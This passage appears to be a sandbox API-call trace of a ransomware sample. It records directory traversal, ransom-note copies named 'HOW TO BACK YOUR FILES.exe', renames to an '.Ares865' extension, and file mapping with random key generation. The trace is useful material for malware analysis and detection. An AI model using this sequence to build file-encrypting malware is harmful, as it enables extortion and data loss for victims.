returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0" [0062.490] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0" | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0" [0062.490] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.490] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.496] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56c17780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c17780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.496] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.497] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.Ares865") returned 84 [0062.497] MoveFileExW (lpExistingFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.Ares865" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.ares865"), dwFlags=0x1) returned 1 [0062.499] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.Ares865" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.499] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2578) returned 1 [0062.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.499] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.500] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.500] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.500] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd20, lpName=0x0) returned 0x118 [0062.502] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd20) returned 0x1a0000 [0062.503] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.504] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.504] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.504] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList", iMaxLength=260 | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" [0062.504] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" | out: lpString1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList") returned="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" [0062.504] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.504] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.508] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.508] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56c3d8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c3d8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.508] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.509] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.509] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.Ares865") returned 99 [0062.509] MoveFileExW (lpExistingFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), lpNewFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.ares865"), dwFlags=0x1) returned 1 [0062.509] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.Ares865" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.509] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7124) returned 1 [0062.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.510] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.511] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ee0, lpName=0x0) returned 0x118 [0062.512] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ee0) returned 0x1a0000 [0062.513] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.514] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.514] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.514] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Synchronization Services", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services") returned="C:\\Program Files\\Microsoft Synchronization Services" [0062.514] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Synchronization Services" | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services") returned="C:\\Program Files\\Microsoft Synchronization Services" [0062.515] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.515] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Synchronization Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft synchronization services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.518] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.518] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56c3d8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c3d8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.518] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.518] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.519] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET") returned="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET" [0062.519] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET" | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET") returned="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET" [0062.519] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.519] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.523] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.523] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56c63a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c63a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.523] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.523] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.523] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0") returned="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0" [0062.523] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0" | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0") returned="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0" [0062.523] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.523] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.529] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.529] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56c63a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c63a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.529] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.529] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.529] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework") returned="C:\\Program Files\\Microsoft Sync Framework" [0062.529] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework") returned="C:\\Program Files\\Microsoft Sync Framework" [0062.529] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.529] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.533] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56c63a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c63a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.533] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.534] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0" [0062.534] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0" [0062.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.538] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.538] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56c63a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c63a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.538] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.538] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime" [0062.538] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime" [0062.538] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.538] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.550] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56c89ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56c89ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.551] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.551] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64" [0062.551] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64" [0062.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.557] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.558] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cafd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cafd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.558] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources" [0062.558] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources" [0062.558] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.558] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.568] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cafd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cafd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.568] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033" [0062.568] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033") returned="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033" [0062.568] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.568] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.573] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56cd5e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56cd5e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.573] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.573] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Sync 